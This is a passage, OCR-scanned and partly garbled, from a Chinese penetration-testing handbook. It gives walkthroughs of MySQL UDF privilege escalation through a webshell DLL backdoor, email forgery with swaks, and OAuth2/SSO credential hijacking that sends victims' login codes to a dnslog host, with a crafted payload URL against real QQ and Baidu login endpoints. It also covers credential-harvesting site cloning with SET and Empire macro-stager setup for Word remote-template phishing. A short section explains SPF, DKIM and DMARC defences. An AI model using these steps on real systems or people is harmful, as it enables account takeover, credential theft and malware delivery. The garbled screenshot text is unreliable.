
Variable_name Value 

secure file priv MM 
因为 secure file priv 参数 是 只 读 参数 ， 不 能 使 用 set global 命 令 修改 。 只 能 是 修改 my.cnf 或 my.ini， 
然后 在 结尾 处 加 上 secure file priv-" 然后 再 重启 mysql。 

当 不 为 NULL 时 ， 可 以 安装 DLL 后 门 成 功 : 

注意 : 


这 里 有 个 坑 ， 如 果 你 是 用 phpstudy 进 行 复 现 的 ， 这 里 虽然 上 面 读 取出 来 的 路 径 是 有 plugin 目 录 的 ， 
但 是 实际 上 去 访问 的 时 候 会 发 现 一 开始 并 不 存在 plugin 目 录 ， 这 里 就 需要 自己 手动 创建 了 。 


) © © 192.168.10.130 - WINNT - Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 





文件 管理 [MYSQL 执 行 语句 ] [MYSQL 近 权 ] [MYSQL 虞 库 备 份 ] [MYSQL 上传 文件 ] [MYSQL 下 载 文件 ] 

执行 命令 地 址 localhost 端口 3306 用 户 root 密码 root 库 名 mysql 
¢:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\mysqiDil.dil 

扫描 端口 成 功 

系统 信息 T" 


接 下 来 就 可 以 进行 执行 命令 了 


2) © © 192.168.10.130 - WINNT - Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 





文件 管理 [MYSQL 执 行 语句 ] [MYSQL 提 权 ] [MYSQL 脱 库 各 份 ] [MYSQL 上 传 文件 ] [MYSQL 下 载 文 件 ] 
Dea: 地 址 localhost 端口 3306 用 户 root #83 root 库 名 mysql 
select state( net user”) f 
扫描 端口 
系统 信息 
MYSQL 执 行 
MYSQL 管 理 
PostgreSQL 
其 它 数据 库 N 
扫描 木马 安装 DL 后门 执行 CM 语句 
搜索 文件 Done:Resource id #6 
mes Array 
Servu 提 权 s. 
i0] => » 
Win 组 件 Pd 
WIN-R2UG3BPHMSS [it : 
反弹 连接 M HMS5 的 用 户 帐户 
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然后 我 们 和 系统 中 mysql 的 执行 角色 进行 比 对 : 


mysqid.exe 332 reboot 0 18,760 K mysqli 





现在 就 已 经 将 权限 提升 到 和 


mysql 的 运行 权限 一 致 了 。 


最 后 ， 总 的 来 说 ，UDF 提 权 就 是 利用 MySdl 允 许 扩展 自 定义 函数 的 特性 ， 将 webshell 的 权限 变 成 和 
mysql 运 行 权限 一 致 ， 所 以 就 有 个 前 提 ，mysql 得 是 以 高 权限 进行 运行 的 ， 至 少 得 比 中 间 件 权限 高 ， 
才 有 用 这 个 方法 进行 提 权 的 必要 。 


836 








社会 工程 学 
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水 坑 攻 击 


“水 坑 攻击 "， 黑 客 攻击 方式 之 一 ， 顾 名 思 义 ， 是 在 受害 者 必 经 之 路 设置 了 一 个 “水 坑 ( 陷 阱 )。 最 常见 
的 做 法 是 ， 黑 客 分 析 攻 击 目标 的 上 网 活动 规律 ， 寻 找 攻 击 目标 经 常 访问 的 网 站 的 弱点 ， 先 将 此 网 站 
“攻破 "并 植 入 攻击 代码 ， 一 旦 攻击 目标 访问 该 网 站 就 会 “中 招 "。 


由 于 此 种 攻击 借助 了 目标 团体 所 信任 的 网 站 ， 攻 击 成 功率 很 高 ， 即 便 是 那些 对 鱼 叉 攻击 或 其 他 形式 
的 钓鱼 攻击 具有 防护 能 力 的 团体 。 


性 质 


水 坑 攻 击 属于 APT 攻 击 的 一 种 ， 与 钓鱼 攻击 相 比 ， 黑 客 无 需 耗 费 精 力 制作 钓鱼 网 站 ， 而 是 利用 合法 
网 站 的 弱点 ， 隐 蔽 性 比较 强 。 在 人 们 安全 意识 不 断 加 强 的 今天 ， 黑 客 处 心 积 虑 地 制作 钓鱼 网 站 却 被 
有 心 人 轻易 识破 ， 而 水 坑 攻 击 则 利用 了 被 攻击 者 对 网 站 的 信任 。 


水 坑 攻 击 利用 网 站 的 弱点 在 其 中 植 入 攻击 代码 ， 攻 击 代码 利用 浏览 器 的 缺陷 ， 被 攻击 者 访问 网 站 时 
终端 会 被 植 入 恶意 程序 或 者 直接 被 盗 取 个 人 重要 信息 。 


水 坑 攻 击 相对 于 通过 社会 工程 方式 引诱 目标 用 户 访问 恶意 网 站 更 具 欺骗 性 ， 效 率 也 更 高 。 水 坑 方法 
主要 被 用 于 有 针对 性 的 攻击 ， 而 Adobe Reader、Java 运 行 时 环境 (IRE) 、Flash 和 IE 中 的 零 漏洞 
被 用 于 安装 恶意 软件 。 
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B xd 


鱼 又 攻击 "是 黑客 攻击 方式 之 一 ， 最 常见 的 做 法 是 ， 将 木马 程序 作为 电子 邮件 的 附件 ， 并 起 上 一 个 
极 具 诱惑 力 的 名 称 ， 发 送 给 目标 电脑 ， 诱 使 受害 者 打开 附件 ， 从 而 感染 木马 。 
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Swaks- 邮 件 伪 造 
简介 


swaks 是 一 个 SMTP 协 议 的 瑞士 军刀 ， 能 够 高 度 定制 化 邮件 报 文 内 容 ， 使 用 它 能 够 对 邮件 服务 器 进 
行 非常 全 面 的 安全 检测 。 


发 信 测 试 


# swaks 
ETIN EEE EYI 
Trying « 
= Connect 
“= Microsoft ESMTP MAIL Se é r 5 May 2019 12:97:26 «0800 


250-SRV-MAIL01.ESG.360ES.CN Hello [19.110.45.235 
50-SIZE 6¢ 
PIPELINING 
DSN 
ENHANCEDSTATUSCODES 
START 
X- ANON UST 
AUTH NTLM LOGIN 
X-EXPS GSSAPI NTLM 
S8BITMIME 
BINARYMIME 
CHUNKING 
0 XRDST 
AIL FROM: <root@kal 


huaishu 
ent OK 


Start mail input; end with <CRLF>.<CRLF> 
Sun, 05 May 2019 90:07:26 -0400 
ba. bx 
» re 
> Subject n, 9 j 2019 00:07 
» Mes “Id: 190595000726.6235 
dad : Swaks v20181104.0 jetmore. 


t mailing 


250 2.6.0 <20190505000726.023582@kali> [InternalId=14813342205136, Hostname= AoE ?de IIS sta. an) Queved mail for delivery 
QUIT 
221 2.0.0 Service closing transmission channel 
Connection closed with remote host 
iT | | 





Swaks --to to@mail.com 


发 送 附件 


swaks --to to@mail.com --from from@mail.com --attach /tmp/sss.rtf 
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2 


(SH 


Trying as TET 
Connected i 
220 tw. 


-SI2E 83886080 
PIPELINING 
DSN 
ENHANCEDSTATUS 
STARTTLS 
X- ANONYMOUSTLS 
AUTH NTLM LOGIN 
X-EXPS GSSAPI NTLM 
BBITMIME 
BINARYMIME 
CHUNKING 
XRDST 
> MAIL FROM: 
250 1.0 Sender OK 
RCPT TO:sIzrb sb 
250 2.1.5 Recipient OK 
> DATA 
354 Start mail input; end 
te: Sun, 05 May ?019 00 
To: NE Fo ETIN. | 
> Fro wee Dees 
> Subject: t , 05 May 
> Message-Id 


to 1: mascir A rà 


from wena. ra: attach 


Microsoft ESMTP MAIL Service ready at Sun, 5 


« Hello [ns dn 245.235] 


with <CRLF>.<CRLF> 


15:51 -0400 


2019 00:15:51 -9400 


1190505001551.023678@kali> 


X-Mail 20181104.0 jetmore.org/john/code/swaks/ 


MIME 
> Content-Type: iltipart/mi 
= MIME BOUNDARY 000 
> Content-Type: text/plain 


> This is a test mailing 
= MIME BOUNDARY 900 
-> Content-Type: 
Content -Description: 
Content-Di ition: 
Content-Transfer-Encoding: 


aGVsbG8K 


MIME BOUNDARY 000 


adming ™ Z w 


05 May 2019 








This is a test mailing sss.rtf 


定制 发 送 


swaks --to to@mail.com --from from@mail.com --data /tmp/mail.data --ehlo mail.cc 


。 data 


xed; boundary MIME BOUNDARY 000 23678 


23678 


23678 


BASE64 


23678 - - 
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邮件 伪造 防御 技术 


SPF 


是 Sender Policy Framework 的 缩写 ， 一 种 以 IP 地 址 认证 电子 邮件 发 件 人 身份 的 技术 。 接收 邮 
件 方 会 首先 检查 域名 的 SPF 记 录 ， 来 确定 发 件 人 的 IP 地 址 是 否 被 包含 在 SPF 记 录 里 面 ， 如 果 在 ， 就 
认为 是 一 封 正 确 的 邮件 ， 否 则 会 认为 是 一 封 伪造 的 邮件 进行 退回 。 


SPF 可 以 防止 别人 伪造 你 来 发 邮件 ， 是 一 个 反 伪造 性 邮件 的 解决 方案 。 当 你 定义 了 你 域名 的 SPF 记 
录 之 后 ， 接收 邮件 方 会 根据 你 的 SPF 记 录 来 确定 连接 过 来 的 IP 地 址 是 否 被 包含 在 SPF 记 录 里 面 ， 如 
果 在 ， 则 认为 是 一 封 正确 的 邮件 ， 否 则 则 认为 是 一 封 伪造 的 邮件 。 





DKIM 


DKIM 是 一 种 防范 电子 邮件 欺诈 的 验证 技术 ， 通 过 消息 加 密 认证 的 方式 对 邮件 发 送 域名 进行 验证 。 


邮件 发 送 方 发 送 邮件 时 ， 利 用 本 域 私 钥 加 密 邮 件 生 成 DKIM 签 名 ， 将 DKIM 签 名 及 其 相关 信息 插入 邮 
件 头 。 邮 件 接收 方 接收 邮件 时 ， 通 过 DNS 查 询 获 得 公 钥 ， 验 证 邮件 DKIM 签 名 的 有 效 性 。 从 而 确认 
在 邮件 发 送 的 过 程 中 ， 防 止 邮 件 被 恶意 纂 改 ， 保 证 邮件 内 容 的 完整 性 。 


DMARC 
DMARC 是 一 种 基于 现 有 的 SPF 和 DKIM 协 议 的 可 扩展 电子 邮件 认证 协议 ， 在 邮件 收发 双方 建立 了 邮 
件 反馈 机 制 ， 便 于 邮件 发 送 方 和 邮件 接收 方 共 同 对 域名 的 管理 进行 完善 和 监督 。 


DMARC 要 求 域名 所 有 者 在 DNS 记录 中 设置 SPF 记 录 和 DKIM 记 录 ， 并 明确 声明 对 验证 失败 邮件 的 处 
理 策略 。 邮 件 接收 方 接收 邮件 时 ， 首 先 通过 DNS 获取 DMARC 记 录 ， 再 对 邮件 来 源 进行 SPF 验 证 和 
DKIM 验 证 ， 对 验证 失败 的 邮件 根据 DMARC 记 录 进 行 处 理 ， 并 将 处 理 结果 反馈 给 发 送 方 。 


DMARC 能 够 有 效 识别 并 拦截 欺诈 邮件 和 钓鱼 邮件 ， 保 障 用 户 个 人 信息 安全 。 


设置 完 SPF 和 DKIM 后 ， 您 就 能 以 TXT 记录 的 形式 向 您 网 域 的 DNS 记录 添加 政策 ， 从 而 配置 
DMARC (方法 与 配置 SPF 或 ADSP 一 样 ) 。 


RA? 











例子 : paypal.com BY dmarc 记录 MON Eis 


_dmarc.paypal.com text="V=DMARC1\; p=reject\; rua=mailto:d@rua.agari.com\; ruf=n 


b 
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钓鱼 攻击 








视觉 效果 
钓鱼 攻击 


钓鱼 式 攻击 是 一 种 企图 从 电子 通讯 中 ， 通 过 伪装 成 信誉 卓著 的 法 人 媒体 以 获得 如 用 户 名 、 密 码 和 信 
用 卡 明细 等 个 人 敏感 信息 的 犯罪 诈骗 过 程 。 这 些 通信 都 声称 (自己 ) 来 自 社交 网 站 拍卖 网 站 \ 网 络 银 
行 、 电 子 支付 网 站 \ 或 网 络 管理 者 ， 以 此 来 诱骗 受害 人 的 轻信 。 网 钓 通常 是 通过 e-mail 或 者 即时 通讯 
进行 。 它 常常 导 引 用 户 到 URL 与 界面 外 观 与 真正 网 站 几 无 二 致 的 假冒 网 站 输入 个 人 数据 。 就 算 使 用 
强 式 加 密 的 SSL 服 务 器 认证 ， 要 侦 测 网 站 是 否 仿冒 实际 上 仍 很 困难 。 


”例子 - 视觉 效果 
某 次 应 急 响应 中 ， 从 A 客 户 (跨国 经 销 商 ) 那里 了 解 到 的 情况 如 下 : 


。 人 是 商家 
。 BB 商家 的 消费 者 
。 CRE 


C 攻 入 了 A 的 邮件 服务 器 ， 并 且 持 续 控制 了 月 一 个 季度 ，3 个 月 。 


B 要 购买 A 的 产品 时 ，A 发 送 合同 给 B， 同 时 C 的 木马 也 在 读 取 邮 件数 据 库 的 内 容 ， 合 同 中 有 付款 账 
户 ，C 从 中 截获 A 的 邮件 ， 并 县 修改 合同 内 容 ， 从 邮件 服务 器 拉 取 到 了 前 一 年 的 合同 模板 ， 将 银行 账 
户 打 印 上 去 ，B 收 到 C 的 合同 后 进行 了 打 款 ， 同 时 B 在 向 A 确认 的 过 程 中 ，A 发 现 B 受 骗 了 。 


SE: 
。 C 怎 么 给 B 发 送 的 邮件 ， 取 得 了 B 的 信任 呢 ? 
这 里 举 个 例子 : fish.com 5 fish.corn 
乍 一 看 ，fish.com 中 的 com 与 corn 非 常 相似 ， 有 个 别 字体 影 响 的 话 ， 还 是 很 难 分 辨 的 ， 更 别 说 牌 果 


Er. 
。 宋体 : 


fish.com 
fish.corn 


。 娃娃 体 : 


845 


























SMASH VRP GRIN FA. RIEG uy 
g bl vè da L. er. 
TRRES E 
FA ATE 
ERRIN 
D 查看 未 安装 字体 
主题 字体 
Calibri Light (标题 ) 


Calibri (正文 ) fish.com 
宋体 (标题 ) fish.corn 


宋体 (正文 ) 
所 有 字体 iT 入 
圆 体 - 简 
圆 体 - 繁 
co Wisi vb-d3 
et ex h- 98 
r 宋体 - 简 
r 宋体 - 繁 
手札 体 - 简 
手札 体 - 繁 
IRR-A 
. RE 3H — 
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凭证 劫持 漏洞 
漏洞 危害 


”支持 凭证 ， 构 造 链接 登录 受害 者 账号 


—— ) 


www.domain.com/new.php?id=1 
www.domain.com/login.php RSHMR BAM, MITE Bdnslogtttt 


HAKBES 
SES Rae 网 站 的 登陆 口 


漏洞 点 类 型 














PSR Lee 访问 dnsiog 地 址 


dnsiog 会 记录 来 源 地 址 





以 访问 外 部 链接 的 网 址 -— 
问 新 闻 地 址 而 图 片 地 址 是 dnsilog 池 址 


SmERP MEHS 自动 加 数 图 片 


1，oauth2 .0 快捷 登录 
2. sso 单 点 登录 系统 


3 ， 注 册 或 者 登录 


oauth2.0 快 捷 登 录 


很 多 厂商 使 用 了 OAuth2.0 的 认证 方式 

利用 场景 : 

1、 主 站 可 第 三 方 登录 ， 漏 洞 站 是 否 第 三 方 登录 都 无 影响 
2、 一 级 域名 下 的 某 个 信任 域 能 够 加 载 外 部 链接 
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ar paiaucam > ees ang 





rius 22 GENS spaa c EX RN SBE Googe | Te (GA A BOUTS (UC o) MER. A NAVEEN = Le tne Oow EYES se 
INT c 0 SQLBASICS- UNION BASED: FRROR/CQUELE QUERY TOOL. WAF BYPASS EW RAI GA Se e * 
Aw Vond URL j jobrneieme 3 — » : 
& eum 

> dee 











Bi Sere Sune Protensions 'ercerany Project - licensed to jay iau  Urimied by macnditosec un 










Repgace Window nep 


Batam sues 
































WA sre anco! 











AVV Tue atio com pl 
iaalay ?Dp no sere basiyo 
ni 


Tar onm 


deer à 


$ & Burp Suite Professional v3.7.26 - Temporary Project - licensed to Larry Lau - Unlimited by mxcxGoseciun 


Burp intruder Repeater Window Help 








Spider | Scanner | intruder Repeater | Sequencer 


| HTTP history WebSockets history | Options | 


L ^| f^ Request to https //graph qq com 443 [183 232 98 149] 






| Project options | User options | 








Forward Dr erceptison | Acti 








Raw | Params Headers | Hex 


GET request to /oauth2 O/authorize 


















Type Name Value 











T | Ad j 
URL client, id 100312028 rc 
URL response type code Renee 
URL display pe U 
URL State 1816618796 ie 
URL redirect uri https //passport baidu comighoenix/account/afterauth?mkeyz061598678db27163358799:94971662 Down | 
URL scope get user info get other info.add t.add : nr ae 




















Cookie eas sid 3195s1x21149D6B5c8B11086z0 

Cookie pv. pad 5645367872 

Cookie pov. pui 9809481728 

Cookie ul 030F2E78-3310-1106-80E7-4203E1295C7E 

Cookie pt2gguin 02375743231 

Cookie RK EfLKTMhkVg 

Cookie ptcz bd916a10c36efo(4&edf1649593974c 1664 1070744db6c7d7 1e 1508191323154 
Cookie _apsvr_localtk 0.20823305284471383 

Cookie pov. si 55309337600 

Cookie uin 02375743231 

Cookie skey @IAIL3 1xgA 

Cookie ptisp om 

Cookie pun 02375743231 

Cookie pt4 token vETKQS-rmDajdA-EALxy6aVKGCk-gySIXf6qihXoY _ 
Cookie p skey Q1Dm7I3MsCV tbhdni/03030bSmm6uSilt4jBOdPhjPJg - 





Body encoding 


这 是 第 三 方 登录 的 接口 : 


https://graph.qq.com/oauth2.0/authorize?client id-100312028&response type-code&c 


这 个 链接 是 第 三 方 登录 口 : ! 


QAR 


$ ^e 


- * 
https://passport.baidu.com/phoenix/account/afterauth?mkey-6f2d1d001e4be09e285ed€ 


> 





现在 分 析 参 数 : ! 


state=1516604022 





redirect uri-https://passport.baidu.com/phoenix/account/afterauth?mkey-6f2d1d001 


> 


redirect_uri 参 数 : 是 要 跳 转 到 这 个 参数 值 网 址 。 
在 这 里 ， 我 们 将 要 跳 转 的 网 址 替换 到 https://passport.baidu.com/phoenix/account/afterauth 


- ? 改 为 & 


最 后 redirect_uri 参 数值 是 redirect_uri= 带 有 外 部 链接 的 网 址 &mkey=6f2d1d001e4be09e285ed693 


注 : 带 有 外 部 链接 的 网 址 是 一 级 域名 的 信任 域 ! 


payload 发 给 目标 的 url: i 


https://graph.qq.com/oauth2.0/authorize?client id-100312028&response type-code&c 
, 
目标 只 要 打开 该 链接 ， 并 且 点 击 头像 登录 。 那 么 就 会 跳 转 到 带 有 外 部 链接 的 网 址 
此 时 第 三 方 登录 会 给 用 户 一 个 code 值 ， 用 户 会 带 着 code 值 去 访问 带 有 外 部 链接 的 网 址 
而 带 有 外 部 链接 的 那个 网 址 会 自动 加 载 外 部 链接 ， 外 部 链接 的 作用 就 是 获取 referer 
那么 黑客 就 会 获取 到 code 值 。 
最 后 劫持 登录 的 payload: | 
访问 第 三 方 登录 口 
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$ * 
4h X 7 


https: //pas sport . baidu .com/phoenix/account/afterauth?mkey=868b9c0330c56e46a27c8ç 


再 访问 httpyAww ju.com 成 功 登 录 目 标 账 户 


sso 单 点 登录 


单 点 登录 (Single SignOn) ， 简 称 为 SSO， 是 目前 比较 流行 的 企业 业务 整合 的 解决 方案 之 一 。 
SSO 的 定义 是 在 多 个 应 用 系统 中 ， 用 户 只 需要 登录 一 次 就 可 以 访问 所 有 相互 信任 的 应 用 系统 。 


www.domain.com 


漏洞 点 : 


5SO 系 统 发 送 了 用 户 和 凭证 










news.domian.com 


有 一 个 跳 转 的 参数 指 启 news.domain.com 
MSR news.domain.commAdnslogtext 





www.domain.com -> aaa.domain.com 


当 A 用 户 登 录 了 www.domain.com 后 ， 访 问 aaa.domain.com 无 需 账号 密码 ，sso 会 发 送 凭证 给 
aaa.domain.como 


支持 : 


抓 取 sso 发 送 给 aaa.domain.com 凭 证 的 数据 包 ， 将 跳 转 到 aaa.domain.com 这 个 值 改 为 我 们 的 dnslog 
地 址 。 


然后 将 这 个 链接 发 送 给 已 经 登录 www.domain.com 的 A 用 户 ， 那 么 A 用 户 会 往 aaa.domain.com 发 送 
凭证 ， 这 时 候 就 被 我 们 的 dnslog 动 持 了 。 


! | Raw | Params | Headers | Hex J Raw Headers | Hex 















Q) Seeks !20200103 Apr 201 16:57:08 GMT 


zti hemi; chavseteut t=. 






人 m aed £d WTF 1.1 302 Moved Temporarily 
Tom nyin 
TOTTTYYS 0 (Windows N 
r 





10- 1£a 9b Lbac Os 107 
or; 


EspireseTue, 10-Apr-2019 


m: ExpiteseTue, iG-Apr-2019 


emm memet 
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EEE [t Q J r = 
raw GUNS GM t TTE 302 Found » * 


Server: nginx 
Dare: Tue, 30 A 2018 12:82:54 GMT 
Content-Length 5 
Connection: clos 
kie: JUESSIONIDeETDOO:BO7BEQ70SUTESORE^e^COAESA^: Partie/ ines 









ul xhtmlexml,appiicat hs 
sh- heen. E, zh- TV; q*0. 7, zh- HE: ences £ 
1ms5/ login. Jsp 





! 
i S 
|] — Betpi// 15; login: jap?eervice=hecp¥ IAN 2742 Fay. be AZF Ims A2 men 
t Perinde scsi LUPINE wR soe sisi 

i 


al 2 ^ 
UM P 

i 

i 

i 

. 


Kaw | Harams | Headers | Hex 





GET 


/lms5/logíin.jsp?service-http&3AS2FS2Fwww.l com*z2Flms5*2Fmember&2Findex&S2Findext3F 
[ticke t*3DS7T 94027" .HEKQpIiUPW3Nt is2éloginMsg%3DO0 HTTP/1.1 

Host: www. . 

jUser-agent: Mozilla/5.0 (Windows HT 10.0; Winé4; xé4; rv: €€.0) Gecko/20100101 
‘Firetox/éé.0 

hecept: text/html,application/xhtml-«xml,application/xml:qe0.9,*/*;q-0.9 
ccept-Lanquage: zh-CN, ch:c=0.8, zh-TW; q=0.7, zh-HE; q=0.5, en-US; q=0.3,en;q=0.2 
|Referer: http://www. h VlmsS/ login.jsp 

onnection: close 

Upgrade-Insecure-Requests: 1 











| 
| 正常 跳 转 的 包 





GET 

/ims5/ login. jsp 
dex*&3Fticket*3D 
Host: www.l "om 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x6é4; rv:ét.0) Gecko/20100101 
Firetox/éé.0 

Accept: text/html,application/xhtml+xml, application/ xml; q=0.9, */*";q=0.8 
Accept-Language: zh-CN, zh; q=0.8, ch-TW;q=0.7, zh-HK; q=0.5, en-US; q=0.3,en;q=0.2 
Referer: http://www. n lms5/ login. jsp 

Connection: close 

Upgrade-Insecure-Requests: 1l 






o$2Flms5t52Fmember*2Findex*Z2Fin 
*3DO HTTP/1.1 


改 为 dnslog 的 值 





e > CQ D 11146dn4e.ceyelo/?ticket=ST-844380-tjg4 
eae G 新 手 上 路 Commu Beem Vlogin-Vvultcom 党 百度 一 下 ， 你 就 知道 站 | 公众 号 /向 信 小 
ri LIT ES 

Gs HE ims eer 


. Qiiod 





ID Name F 
http.//111.46dn4e.ceye.io/?ticket-ST-844380-tig4cyTBzZDIDU 84 
785256 &loginMsg-0 
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注册 登录 


新 用 户 注册 或 者 用 户 登录 的 时 候 ， 网 站 会 传递 凭证 给 用 户 。 这 时 候 通过 修改 redirect_urI 为 自己 的 
dnslog， 去 支持 凭证 


https://aaa.xxxxx.com/MxkEngine/mobilePage/xxdc register login/xxdc login.html?j 


b 





成 功 跳 转 到 www2.hg8l7g.ceye.io 





Qu? 





克隆 技术 
克隆 技术 - Clone 


Kali linux - setookit 


Visit: https://www.trustedsec.com 


It's easy to update using the PenTesters Framework! (PTF) 


/isit https://github.com/trustedsec/ptf to update all your tools! 


Your version: 
Current version: 8.0 


lease update SET to the latest before submitting any git issues. 


Select from the menu: 


Social-Engineering Attacks 
Penetration Testing (Fast-Track) 
Third Party Modules 

Update the Social-Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


Exit the Social-Engineer Toolkit 


1) Social-Engineering Attacks 社会 工程 学 攻击 
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Please update SET to the latest before submitting any git issues. 


Select from the menu: 


1) Spear-Phishing Attack Vectors # 钓鱼 邮件 

2) Website Attack Vectors # 网 站 攻击 

3) Infectious Media Generator # 媒体 生成 接口 

4) Create a Payload and Listener # 创建 一 个 载荷 与 监听 
5) Mass Mailer Attack # 群发 邮件 攻击 

6) Arduino-Based Attack Vector # 基于 Arduino 的 攻击 
7) Wireless Access Point Attack Vector # 无 线 接 入 点 攻击 
8) QRCode Generator Attack Vector # 二 维 码 生成 器 攻击 
) Powershell Attack Vectors # Powershell 

10) SMS Spoofing Attack Vector # 短信 欺骗 攻击 

) Third Party Modules # 第 三 方 模块 


99) Return back to the main menu. 


he Web-Jacking Attack method was introduced by white sheep, emgent. 
s to make the highlighted URL Link to appear legitimate however whe 
aced with the malicious link. You can edit the link replacement sett 
fast. 


he Multi-Attack method will add a combination of attacks through thé 
utilize the Java Applet, Metasploit Browser, Credential Harvester/Tali 
ccessful. 


he HTA Attack method will allow you to clone a site and perform powé 
ch can be used for Windows-based powershell exploitation through the 


1) Java Applet Attack Method 
2) Metasploit Browser Exploit Method 
| Credential Harvester Attack Method 

4) rabnabbing Attack Method 
Web Jacking Attack Method 
Multi-Attack Web Method 
Full Screen Attack Method 
HTA Attack Method 


Return to Main Menu 





3) Credential Harvester Attack Method 凭证 获取 


克隆 一 个 新 的 站 点 : 
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The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack.. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


Return to Webattack Menu 
ey 


设置 一 个 监听 地 址 ， 用 于 接收 凭证 : 


Gt wet Ty] 
[-] Credential harvester will allow you to utilize the clone capabilities within SET 
[-] to harvest credentials or parameters from a website as well as place them into a report 


The way that this works is by cloning a site and looking for form fields to 
rewrite. If the POST fields are not usual methods for posting forms this 
could fail. If it does, you can always save the HTML, rewrite the forms to 
be standard forms and use the "IMPORT" feature. Additionally, really 
important: 


If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL 

IP address below, not your NAT address. Additionally, if you don't know 
basic networking concepts, and you have a private IP address, you will 
need to do port forwarding to your NAT IP address from your external IP 
address. A browser doesns't know how to communicate with a private IP 
address, so if you don't specify an external IP address if you are using 
this from an external perpective, it will not work. This isn't a SET issue 
this is how networking works. 


tack» IP address for the POST back in Harvester/Tabnabbing [192.168.117.133]: 


:webattack» IP address for the POST back in Harvester/Tabnabbing [192.168.117.133]: 
SET supports both HTTP and HTTPS 
Example: http://www. thisisafakesite.com 

stiwebattack> Enter the url to clone:http:// eretier. yura Jke tup? 


Cloning the website: http: //2euber. yume ke ceo 
This could take a little bit... 


{*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is. 
Press (return) if you understand what we're saying here.ff 





Cloning the website: http://ms 


i a jznruarr ae 
This could take a little bit... 


[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is 
Press (return) if you understand what we're saying here. 
T Toolkit’ Cred " UE 


be 


HTTP/1 


nig =- 
toutffz, 


authenticity token-WikglRbOnSRUQCMyBOvlpwWknN5-F sLTvsNVNwhps Lj ELBVGQoOdhMrqePF xbI8OFTxEdt lKamor 


captcha=111 
captcha key=e6c56d8d83415311c417d2f24a3f93316f8cac88 











Word 文 档 --- 云 宏 代码 钓鱼 


与 传统 的 宏 启 用 文档 相 比 ， 这 种 攻击 的 好 处 是 多 方面 的 。 在 对 目标 执行 网 络 钓 鱼 攻击 时 ， 您 可 以 将 ,doc 
这 种 攻击 更 常见 另 一 个 原因 可 能 是 因为 附件 本 身 不 包含 恶意 代码 ， 任 何 静 态 电子 邮件 扫描 程序 都 不 会 看 3 


> 


宏 代 码 的 准备 : 
安装 工具 Empire: 


git clone https://github.com/EmpireProject/Empire.git 
cd Empire 

cd setup 

./install.sh 

./reset.sh 


MON NES WY 


Jreset sh 过 程 中 一 般 会 报错 ， 根 据 报错 信息 百度 安装 对 应 的 python 库 就 行 。 
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运行 成 功 的 话 直接 进入 工具 界面 : 


2.5 | [Web] https://github 


285 modules currently loaded 


6 listeners currently active 


6 agents currently active 


(Empire) > | 


创建 监听 器 : 


> listeners 


有 这 个 是 正常 的 ，， 因 为 刚 开始 使 用 ， 肯 





> uselistener http 

> Info 

> set Name Xxxx 

> set Host http://xxxx: 
> Set POTE XXX 


> execute 





是 没有 监听 器 在 活动 的 





(XXX 为 自 定义 监听 器 名 字 ) 


XXX 


(xxx 为 监听 器 的 TP+ 监 听 的 端口 ) 








监听 的 端口 ) 


! [RH . png] (./img/20191218101221578746817. png) 


(出 现 红色 字体 不 要 慌 ，i 这 个 只 


创建 宏 病毒 : 





是 提醒 不 要 





在 生产 环境 下 使 用 该 工具 ) 


! [图 片 .png]( 


> 


> back y pitie 

> usestager windows/macro 

> set Listener xxx (Listener BAILA sz RENS) (xxx 为 自 定义 监听 器 的 名 字 ) 
> execute 


! [EIE . png] (./img/2019121810: 


> 
查看 宏 病毒 代码 内 容 : 


> cat /tmp/macro 


! [FAK . png] ( ./img/20191218101415346130847.png) 


前 置 准备 完毕 ， 即 将 开始 : 


想 要 开始 此 攻击 ， 我 们 需要 创建 两 个 不 同 的 文件 。 第 一 个 是 启用 宏 的 模板 ， 或 是 . dotm 文 件 ， 它 将 包含 a 


> 


(1) 创 建 启用 宏 的 模板 : 
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想 要 使 此 攻击 起 作用 ， 我 们 需要 创建 一 个 支持 安 的 Word 模 板 (. dotm 文 件 扩展 名 ) ， 其 中 将 包含 我 们 的 
新 建 一 个 word 文 档 : 


然后 选择 任意 功能 框 右键 - - - -> 选择 自 定义 功能 区 : 
<span lang="EN-US">! (BJF. png](./img/20191215 
勾 选 选项 开发 工具 并 确定 : 
«span lang="EN-US">1![ 图 片 ,png](,/img/20191218101953887941172 
功能 框 里 选择 新 出 现 的 开发 工具 - - - -> 单 击 visual basic: «span lang="EN-US"></span> 
1 [图 片 .png](./img/201912181020344480: 
! [图 片 , png](./img/20191218102102166680338.png) 
1 [EIR . png] (./img/20191218102130103023542.png) 
Ctrl+s 保存 : «span lang="EN-US"></span> 
! [图 片 .png]( ,/img/20191218102303833285812 ,png ) 
! [图 片 . png](./img/201912 
保存 完 后 弹出 的 保存 后 的 文档 ，， 可 以 直接 关 了 ， 记 住 该 文件 的 绝对 路 径 就 行 <span lang="EN-US"> 
! [图 片 ,png](,./img/29191218102404269270241.png ) 


(2) 将 带 有 宏 病 毒 的 模板 寄存 到 云端 : 《这 里 我 寄存 到 本 地 虚 
拟 机 措 建 的 web 服 务 上 ) 


greedypaw@Greedypaw:~/web/apache-tomcat-8. 
1.php index.html 





greedypaw@Greedypaw: ~/web/apache- tomcat-8.5.^ 


192.168.126.130 


正在 打开 vul.dotm x 


您 选择 了 打开 : 
vul.dotm 


文件 类 型 : Microsoft Word Macro-Enabled Template (23.8 KB) 
来 源 : http://192.168.126.130:8080 


您 想 要 Firefox 如 何 处 理 此 文件 ? 
@ 打开 ， 通 过/O) Microsoft Ward (BRA) 


(3) 创 建 使 用 宏 模板 的 文档 : 
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新 建 启用 模板 的 文档 : 《直接 在 test , docx 中 新 建 ) «span lang="EN-US"></span> 
! [EIA .png](./img/20191218102553525074462.png) 
! [EIE . png] (./img/20191218: 

此 时 弹出 新 建 word 文 档 : 

«span lang="EN-US">! [图片 .png](./img/20191218102630316163067 
